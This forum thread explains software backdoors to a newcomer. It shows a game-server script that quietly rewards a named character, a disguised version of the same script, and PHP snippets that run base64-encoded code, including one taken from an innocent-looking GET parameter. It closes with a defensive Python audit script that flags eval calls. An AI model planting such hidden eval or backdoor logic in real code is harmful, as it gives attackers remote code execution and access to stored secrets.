Information to newbies

Horyon

Hello guys.

Yesterday I was reading some posts and found a thing that made me want to know more about it. The subject is "backdoor". From the conversation, it looks like it is a vulnerability in the source project that allows the creator of this backdoor to do "bad" stuff.

Can one of you take a few minutes to share some knowledge about it?

Ty in advance.
 
Solution
This is a primitive example, but it will show a rough direction.

C#:
EventHandler ATTACKED( attacker )
    {
        if(attacker.name == "BackdoorBasya" && OwnItemCount(attacker, @adena) == 5120)
        {
            GiveItem1(attacker, @coin_of_luck, 1);
        }
    }

A char with the name BackdoorBasya and an adena amount of 5120 in inventory gets 1 CoL after every hit on an NPC.

This is only an example. A good backdoor does not look like that; sometimes it's almost impossible to find.
 
Hmmmmm... so basically it's custom stuff inside a project (source) that the owner puts in to have ways to exploit a server that uses his files.

Does the Mobius source have that kind of stuff?

Anyway, ty for the info, default, I get it.
 
Intruders try to hide backdoors.

As a simple example, the code above can be:
C#:
EVENT_COUNT = 5120;
...
MANA_AMOUNT = 57;
...
SAVE_EVENT_STATE = 4036;
...

function bool checkEventCondition( attacker , itemId)
{
    return OwnItemCount(attacker, itemId) == EVENT_COUNT;
}
...
function eventRequest( attacker,  operationId, type)
{
    GiveItem1(attacker, operationId, type);
}
...
function EventHandler ATTACKED( attacker )
{
    local string event_npc;
    ...
    event_npc = "Piglet";
    ...
    if (attacker.name == event_npc && checkEventCondition(attacker, MANA_AMOUNT))
    {
        eventRequest(attacker, SAVE_EVENT_STATE, 1);
    }
   ...
}

It still does the same, but a bit hidden (all the code looks valid, and may be implemented in different parts of the code).

Of course, you don't really need a backdoor this way. You can hide code for remote control, add unhandled exceptions to break some mechanics, add lower-level code (that is hard to read and understand) with a custom script execution feature, etc.

Moreover, sometimes backdoors are created naturally, without malicious intent.
 
Sometimes you can find something more interesting and not as clear as the examples above.
I am from web development and work with PHP, but I think this approach can be used for Java too.

Let's assume that $value is not static; we get it from POST or GET.
PHP:
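<?php
// Stand-in for application configuration that should never be exposed.
$settings = [
  'database_password' => 'secret value'
];
// Base64 text that decodes to PHP source.
$value = 'dmFyX2R1bXAoJHNldHRpbmdzKTtleGl0KCk7';
// The decoded string is executed as code.
eval(base64_decode($value));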

As a result, we will see:
Formatting (BB code):
afaibyshev@Antons-MacBook-Pro test % php hack.php
array(1) {
  ["database_password"]=>
  string(12) "secret value"
}

The logic is very simple:
$value is a base64 hash of some code.
Here it is 'var_dump($settings);exit();'
After that, we decode this value and eval it.
Eval executes code)

Also, it is easy to hide some magic strings by using headers, GET, or POST.
PHP:
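<?php
$settings = [
  'database_password' => 'secret value'
];
// The encoded code now arrives in an innocent-looking request parameter.
$value = $_GET['hideErrors'] ?? '';
if (!empty($value)) {
    // Whatever the caller sent is decoded and executed.
    eval(base64_decode($value));
}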

But, as you can see, we still use eval.


It is a simple example for the web; Java and the server have more ways to do it...
So, good luck)
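
An audit sketch for the point made above that the hidden variants "still use eval" (added example, not code from any poster in this thread): it flags each eval() in PHP source, records whether the argument is decoded or comes from request input, and decodes a hard-coded base64 blob to show what it would run. The name audit_php and the per-line, single-file matching are assumptions of this example.

```python
import base64
import re

# Inputs: the two PHP snippets from the post above, embedded so this runs offline.
STATIC_SAMPLE = """<?php
$settings = ['database_password' => 'secret value'];
$value = 'dmFyX2R1bXAoJHNldHRpbmdzKTtleGl0KCk7';
eval(base64_decode($value));
"""
REQUEST_SAMPLE = """<?php
$value = $_GET['hideErrors'] ?? '';
if (!empty($value)) {
    eval(base64_decode($value));
}
"""

EVAL_RE = re.compile(r"\beval\s*\((.*)\)\s*;")
ASSIGN_RE = re.compile(r"(\$\w+)\s*=(?![=>])\s*(.+?);\s*$")
REQUEST_RE = re.compile(r"\$_(?:GET|POST|REQUEST|COOKIE|SERVER)\b")
B64_LITERAL_RE = re.compile(r"^(['\"])([A-Za-z0-9+/=]{8,})\1$")


def audit_php(source):
    """Return one finding per eval() call: (line, reasons, decoded payload or None)."""
    assigned = {}  # variable -> right-hand side of its most recent assignment
    findings = []
    for lineno, line in enumerate(source.splitlines(), 1):
        call = EVAL_RE.search(line)
        if call:
            arg = call.group(1)
            # One-hop taint: the argument itself plus what its variables were assigned.
            origins = [arg] + [assigned.get(v, "") for v in re.findall(r"\$\w+", arg)]
            reasons, payload = ["eval"], None
            if "base64_decode" in arg:
                reasons.append("decoded-argument")
                for literal in filter(None, map(B64_LITERAL_RE.match, origins)):
                    try:  # reveal what a hard-coded blob would execute
                        payload = base64.b64decode(literal.group(2), validate=True).decode()
                    except ValueError:
                        pass  # not valid base64 or not text: leave payload unset
            if any(REQUEST_RE.search(o) for o in origins):
                reasons.append("request-input")
            findings.append((lineno, reasons, payload))
        assign = ASSIGN_RE.search(line)
        if assign:
            assigned[assign.group(1)] = assign.group(2).strip()
    return findings
```

A backdoor written without eval, like the game-script example earlier in the thread, passes this check; it only narrows down where to start reading.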
 
Nice subject to know exists. From now on, I will look more deeply at the code.

Ty to all who took some time to explain it. :)
 